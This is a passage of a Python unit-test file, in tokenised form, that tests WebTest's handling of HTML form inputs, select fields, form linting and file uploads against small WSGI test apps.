<lambda>:res.form)<block_end><block_end><class_stmt>TestInput(unittest.TestCase)<block_start><def_stmt>callFUT self filename='form_inputs.html'<block_start>dirname=os.path.join(os.path.dirname(__file__) 'html')<line_sep>app=DebugApp(form=os.path.join(dirname filename) show_form=<true>)<line_sep><return>webtest.TestApp(app)<block_end><def_stmt>test_input self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>form=res.forms['text_input_form']<line_sep>self.assertEqual(form['foo'].value 'bar')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'bar')])<line_sep>form=res.forms['radio_input_form']<line_sep>self.assertEqual(form['foo'].selectedIndex 1)<line_sep>self.assertEqual(form['foo'].value 'baz')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'baz')])<line_sep>form=res.forms['checkbox_input_form']<line_sep>self.assertEqual(form['foo'].value 'bar')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'bar')])<line_sep>form=res.forms['password_input_form']<line_sep>self.assertEqual(form['foo'].value 'bar')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'bar')])<block_end><def_stmt>test_force_radio_input self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>form=res.forms['radio_input_form']<line_sep>form['foo'].force_value('fido')<line_sep>self.assertEqual(form['foo'].value 'fido')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'fido')])<block_end><def_stmt>test_radio_input_order self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>form=res.forms['complex_radio_input_form']<line_sep>form['foo'].value='true'<line_sep>self.assertEqual(form['foo'].value 'true')<line_sep>self.assertEqual(form['foo'].selectedIndex 0)<line_sep>self.assertEqual(form.submit_fields() [('__start__' 'item:mapping') ('foo' 'true') ('__end__' 'item:mapping') ('__start__' 'item:mapping') ('__end__' 'item:mapping')])<line_sep>res=app.get('/form.html')<line_sep>form=res.forms['complex_radio_input_form']<line_sep>self.assertEqual(form['foo'].value 'true')<line_sep>self.assertEqual(form['foo'].selectedIndex 1)<line_sep>self.assertEqual(form.submit_fields() [('__start__' 'item:mapping') ('__end__' 'item:mapping') ('__start__' 'item:mapping') ('foo' 'true') ('__end__' 'item:mapping')])<block_end><def_stmt>test_input_unicode self<block_start>app=self.callFUT('form_unicode_inputs.html')<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>self.assertEqual(res.charset.lower() 'utf-8')<line_sep>form=res.forms['text_input_form']<line_sep>self.assertEqual(form['foo'].value u('Хармс'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Хармс'))])<line_sep>form=res.forms['radio_input_form']<line_sep>self.assertEqual(form['foo'].selectedIndex 1)<line_sep>self.assertEqual(form['foo'].value u('Блок'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Блок'))])<line_sep>form=res.forms['checkbox_input_form']<line_sep>self.assertEqual(form['foo'].value u('Хармс'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Хармс'))])<line_sep>form=res.forms['password_input_form']<line_sep>self.assertEqual(form['foo'].value u('Хармс'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Хармс'))])<block_end><def_stmt>test_input_no_default self<block_start>app=self.callFUT('form_inputs_with_defaults.html')<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>form=res.forms['text_input_form']<line_sep>self.assertEqual(form['foo'].value '')<line_sep>self.assertEqual(form.submit_fields() [('foo' '')])<line_sep>form=res.forms['radio_input_form']<line_sep>self.assertTrue(form['foo'].value<is><none>)<line_sep>self.assertEqual(form.submit_fields() [])<line_sep>form=res.forms['checkbox_input_form']<line_sep>self.assertTrue(form['foo'].value<is><none>)<line_sep>self.assertEqual(form.submit_fields() [])<line_sep>form=res.forms['password_input_form']<line_sep>self.assertEqual(form['foo'].value '')<line_sep>self.assertEqual(form.submit_fields() [('foo' '')])<block_end><def_stmt>test_textarea_entities self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>form=res.forms.get("textarea_input_form")<line_sep>self.assertEqual(form.get("textarea").value "'foo&bar'")<line_sep>self.assertEqual(form.submit_fields() [('textarea' "'foo&bar'")])<block_end><def_stmt>test_textarea_emptyfirstline self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>form=res.forms.get("textarea_emptyline_form")<line_sep>self.assertEqual(form.get("textarea").value "aaa")<line_sep>self.assertEqual(form.submit_fields() [('textarea' "aaa")])<block_end><block_end><class_stmt>TestFormLint(unittest.TestCase)<block_start><def_stmt>test_form_lint self<block_start>form=webtest.Form(<none> '''<form> <input type="text" name="field"/> </form>''')<line_sep>self.assertRaises(AttributeError form.lint)<line_sep>form=webtest.Form(<none> '''<form> <input type="text" id="myfield" name="field"/> </form>''')<line_sep>self.assertRaises(AttributeError form.lint)<line_sep>form=webtest.Form(<none> '''<form> <label for="myfield">my field</label> <input type="text" id="myfield" name="field"/> </form>''')<line_sep>form.lint()<line_sep>form=webtest.Form(<none> '''<form> <label class="field" for="myfield" role="r">my field</label> <input type="text" id="myfield" name="field"/> </form>''')<line_sep>form.lint()<block_end><block_end><def_stmt>select_app environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=to_bytes(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option value="4">Four</option> <option value="5" selected="selected">Five</option> <option value="6">Six</option> <option value="7">Seven</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple> <option value="8" selected="selected">Eight</option> <option value="9">Nine</option> <option value="10">Ten</option> <option value="11" selected="selected">Eleven</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """)<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=to_bytes(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """%dict(selection=selection select_type=select_type))<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<line_sep><return>[body]<block_end><def_stmt>select_app_without_values environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=to_bytes(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option>Four</option> <option>Five</option> <option>Six</option> <option>Seven</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple="multiple"> <option>Eight</option> <option selected value="Nine">Nine</option> <option>Ten</option> <option selected>Eleven</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """)<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=to_bytes(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """%dict(selection=selection select_type=select_type))<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<line_sep><return>[body]<block_end><def_stmt>select_app_without_default environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=to_bytes(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option value="4">Four</option> <option value="5">Five</option> <option value="6">Six</option> <option value="7">Seven</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple="multiple"> <option value="8">Eight</option> <option value="9">Nine</option> <option value="10">Ten</option> <option value="11">Eleven</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """)<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=to_bytes(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """%dict(selection=selection select_type=select_type))<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<line_sep><return>[body]<block_end><def_stmt>select_app_unicode environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=u(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option value="ЕКБ">Екатеринбург</option> <option value="МСК" selected="selected">Москва</option> <option value="СПБ">Санкт-Петербург</option> <option value="САМ">Самара</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple="multiple"> <option value="8" selected="selected">Лондон</option> <option value="9">Париж</option> <option value="10">Пекин</option> <option value="11" selected="selected">Бристоль</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """).encode('utf8')<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=(u(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """)%dict(selection=selection select_type=select_type)).encode('utf8')<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<if_stmt><not>isinstance(body bytes)<block_start><raise>AssertionError('Body is not %s'%bytes)<block_end><return>[body]<block_end><class_stmt>TestSelect(unittest.TestCase)<block_start><def_stmt>test_unicode_select self<block_start>app=webtest.TestApp(select_app_unicode)<line_sep>res=app.get('/')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value u("МСК"))<line_sep>display=single_form.submit("button")<line_sep>self.assertIn(u("<p>You selected МСК</p>") display display)<line_sep>res=app.get('/')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value u("МСК"))<line_sep>single_form.set("single" u("СПБ"))<line_sep>self.assertEqual(single_form["single"].value u("СПБ"))<line_sep>display=single_form.submit("button")<line_sep>self.assertIn(u("<p>You selected СПБ</p>") display display)<block_end><def_stmt>test_single_select self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "5")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 5</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "5")<line_sep>single_form.set("single" "6")<line_sep>self.assertEqual(single_form["single"].value "6")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 6</p>" display display)<line_sep>res=app.get('/')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertRaises(ValueError single_form.select "single" "5" text="Five")<line_sep>self.assertRaises(ValueError single_form.select "single" text="Three")<line_sep>single_form.select("single" text="Seven")<line_sep>self.assertEqual(single_form["single"].value "7")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 7</p>" display display)<block_end><def_stmt>test_single_select_forced_value self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "5")<line_sep>self.assertRaises(ValueError single_form.set "single" "984")<line_sep>single_form["single"].force_value("984")<line_sep>self.assertEqual(single_form["single"].value "984")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 984</p>" display display)<block_end><def_stmt>test_single_select_no_default self<block_start>app=webtest.TestApp(select_app_without_default)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "4")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 4</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "4")<line_sep>single_form.set("single" 6)<line_sep>self.assertEqual(single_form["single"].value "6")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 6</p>" display display)<block_end><def_stmt>test_multiple_select self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ['8' '11'] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 8, 11</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["8" "11"] multiple_form["multiple"].value)<line_sep>multiple_form.set("multiple" ["9"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["9"] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 9</p>" display display)<line_sep>res=app.get('/')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertRaises(ValueError multiple_form.select_multiple "multiple" ["8" "10"] texts=["Eight" "Ten"])<line_sep>self.assertRaises(ValueError multiple_form.select_multiple "multiple" texts=["Twelve"])<line_sep>multiple_form.select_multiple("multiple" texts=["Eight" "Nine" "Ten"])<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 8, 9, 10</p>" display display)<block_end><def_stmt>test_multiple_select_forced_values self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["8" "11"] multiple_form["multiple"].value)<line_sep>self.assertRaises(ValueError multiple_form.set "multiple" ["24" "88"])<line_sep>multiple_form["multiple"].force_value(["24" "88"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["24" "88"] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 24, 88</p>" display display)<block_end><def_stmt>test_multiple_select_no_default self<block_start>app=webtest.TestApp(select_app_without_default)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertTrue(multiple_form["multiple"].value<is><none> repr(multiple_form["multiple"].value))<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected </p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertTrue(multiple_form["multiple"].value<is><none> multiple_form["multiple"].value)<line_sep>multiple_form.set("multiple" ["9"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["9"] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 9</p>" display display)<block_end><def_stmt>test_select_no_value self<block_start>app=webtest.TestApp(select_app_without_values)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "Four")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected Four</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "Four")<line_sep>single_form.set("single" "Six")<line_sep>self.assertEqual(single_form["single"].value "Six")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected Six</p>" display display)<block_end><def_stmt>test_multiple_select_no_value self<block_start>app=webtest.TestApp(select_app_without_values)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Eleven"])<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected Nine, Eleven</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Eleven"])<line_sep>multiple_form.set("multiple" ["Nine" "Ten"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Ten"])<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected Nine, Ten</p>" display display)<block_end><def_stmt>test_multiple_select_reset_value self<block_start>app=webtest.TestApp(select_app_without_values)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Eleven"])<line_sep># reset with value multiple_form["multiple"].value=[]<line_sep>self.assertIsNone(multiple_form["multiple"].value)<line_sep># re-set a value multiple_form["multiple"].value=['Nine']<assert_stmt>multiple_form["multiple"].value<eq>['Nine']<line_sep># reset with force_value multiple_form["multiple"].force_value(<none>)<line_sep>self.assertIsNone(multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected </p>" display display)<block_end><block_end><class_stmt>SingleUploadFileApp<block_start>body=b""" <html> <head><title>form page</title></head> <body> <form method="POST" id="file_upload_form" enctype="multipart/form-data"> <input name="file-field" type="file" value="some/path/file.txt" /> <input name="int-field" type="text" value="" /> <input name="button" type="submit" value="single"> </form> </body> </html> """<def_stmt>__call__ self environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=self.body<block_end><else_stmt><block_start>body=b""" <html> <head><title>display page</title></head> <body> """+self.get_files_page(req)+b""" </body> </html> """<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<assert_stmt>(isinstance(body bytes))<line_sep><return>[body]<block_end><def_stmt>get_files_page self req<block_start>file_parts=[]<line_sep>uploaded_files=[(k v)<for>k,v req.POST.items()<if>'file'<in>k]<line_sep>uploaded_files=sorted(uploaded_files)<for_stmt>name,uploaded_file uploaded_files<block_start><if_stmt>isinstance(uploaded_file cgi.FieldStorage)<block_start>filename=to_bytes(uploaded_file.filename)<line_sep>value=to_bytes(uploaded_file.value 'ascii')<line_sep>content_type=to_bytes(uploaded_file.type 'ascii')<block_end><else_stmt><block_start>filename=value=content_type=b''<block_end>file_parts.append(b""" <p>You selected '"""+filename+b"""'</p> <p>with contents: '"""+value+b"""'</p> <p>with content type: '"""+content_type+b"""'</p> """)<block_end><return>b''.join(file_parts)<block_end><block_end><class_stmt>UploadBinaryApp(SingleUploadFileApp)<block_start><def_stmt>get_files_page self req<block_start>uploaded_files=[(k v)<for>k,v req.POST.items()<if>'file'<in>k]<line_sep>data=uploaded_files[0][1].value<line_sep>data=struct.unpack(b'255h' data[:510])<line_sep><return>b','.join([to_bytes(str(i))<for>i data])<block_end><block_end><class_stmt>MultipleUploadFileApp(SingleUploadFileApp)<block_start>body=b""" <html> <head><title>form page</title></head> <body> <form method="POST" id="file_upload_form" enctype="multipart/form-data"> <input name="file-field-1" type="file" /> <input name="file-field-2" type="file" /> <input name="button" type="submit" value="single"> </form> </body> </html> """<block_end><class_stmt>TestFileUpload(unittest.TestCase)<block_start><def_stmt>assertFile self name contents display content_type=<none><block_start><if_stmt>isinstance(name bytes)<block_start>text_name=name.decode('ascii')<block_end><else_stmt><block_start>text_name=name<block_end>self.assertIn("<p>You selected '"+text_name+"'</p>" display display)<if_stmt>isinstance(contents bytes)<block_start>text_contents=contents.decode('ascii')<block_end><else_stmt><block_start>text_contents=contents<block_end>self.assertIn("<p>with contents: '"+text_contents+"'</p>" display display)<if_stmt>content_type<block_start>self.assertIn("<p>with content type: '"+content_type+"'</p>" display display)<block_end><block_end><def_stmt>test_no_uploads_error self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>app.get('/').forms["file_upload_form"].upload_fields()<block_end><def_stmt>test_upload_without_file self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>upload_form=app.get('/').forms["file_upload_form"]<line_sep>upload_form.submit()<block_end><def_stmt>test_file_upload_with_filename_only self<block_start>uploaded_file_name=os.path.join(os.path.dirname(__file__) "__init__.py")<line_sep>uploaded_file_contents=open(uploaded_file_name).read()<line_sep>uploaded_file_contents=to_bytes(uploaded_file_contents)<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>self.assertEqual(res.charset 'utf-8')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" (uploaded_file_name ))<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file_name uploaded_file_contents display)<block_end><def_stmt>test_file_upload_with_filename_and_contents self<block_start>uploaded_file_name=os.path.join(os.path.dirname(__file__) "__init__.py")<line_sep>uploaded_file_contents=open(uploaded_file_name).read()<line_sep>uploaded_file_contents=to_bytes(uploaded_file_contents)<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" (uploaded_file_name uploaded_file_contents))<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file_name uploaded_file_contents display)<block_end><def_stmt>test_file_upload_with_content_type self<block_start>uploaded_file_name=os.path.join(os.path.dirname(__file__) "__init__.py")<with_stmt>open(uploaded_file_name 'rb')<as>f<block_start>uploaded_file_contents=f.read()<block_end>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form["file-field"].value=Upload(uploaded_file_name uploaded_file_contents 'text/x-custom-type')<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file_name uploaded_file_contents display content_type='text/x-custom-type')<block_end><def_stmt>test_file_upload_binary self<block_start>binary_data=struct.pack('255h' *range(0 255))<line_sep>app=webtest.TestApp(UploadBinaryApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' binary_data))<line_sep>display=single_form.submit("button")<line_sep>self.assertIn(','.join([str(n)<for>n range(0 255)]) display)<block_end><def_stmt>test_multiple_file_uploads_with_filename_and_contents self<block_start>uploaded_file1_name=os.path.join(os.path.dirname(__file__) "__init__.py")<line_sep>uploaded_file1_contents=open(uploaded_file1_name).read()<line_sep>uploaded_file1_contents=to_bytes(uploaded_file1_contents)<line_sep>uploaded_file2_name=__file__<line_sep>uploaded_file2_name=os.path.join(os.path.dirname(__file__) 'html' "404.html")<line_sep>uploaded_file2_contents=open(uploaded_file2_name).read()<line_sep>uploaded_file2_contents=to_bytes(uploaded_file2_contents)<line_sep>app=webtest.TestApp(MultipleUploadFileApp())<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field-1" (uploaded_file1_name uploaded_file1_contents))<line_sep>single_form.set("file-field-2" (uploaded_file2_name uploaded_file2_contents))<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file1_name uploaded_file1_contents display)<line_sep>self.assertFile(uploaded_file1_name uploaded_file1_contents display)<block_end><def_stmt>test_post_int self<block_start>binary_data=struct.pack('255h' *range(0 255))<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' binary_data))<line_sep>single_form.set("int-field" 100)<line_sep># just check it does not raise single_form.submit("button")<block_end><def_stmt>test_invalid_types self<block_start>binary_data=struct.pack('255h' *range(0 255))<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' binary_data))<line_sep>single_form.set("int-field" SingleUploadFileApp())<line_sep>self.assertRaises(ValueError single_form.submit "button")<block_end><def_stmt>test_upload_invalid_content self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' 1))<try_stmt><block_start>single_form.submit("button")<block_end><except_stmt>ValueError<block_start>e=sys.exc_info()[1]<line_sep>self.assertEquals(str(e) u('File content must be %s not %s'%(bytes int)))<block_end><block_end><def_stmt>test_invalid_uploadfiles self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>self.assertRaises(ValueError app.post '/' upload_files=[()])<line_sep>self.assertRaises(ValueError app.post '/' upload_files=[('name' 'filename' 'content' 'extra')])<block_end><def_stmt>test_goto_upload_files self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>resp=app.get('/')<line_sep>resp=resp.goto('/' method='post' upload_files=[('file' 'filename' b'content')])<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: 'content'</p>")<block_end><def_stmt>test_post_upload_files self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>resp=app.post('/' upload_files=[('file' 'filename' b'content')])<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: 'content'</p>")<block_end><def_stmt>test_post_upload_empty_files self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>resp=app.post('/' upload_files=[('file' 'filename' b'')])<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: ''</p>")<line_sep>resp=app.get('/')<line_sep>form=resp.form<line_sep>form['file-field']=Upload('filename' b'' 'text/plain')<line_sep>resp=form.submit()<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: ''</p>")<block_end><block_end>
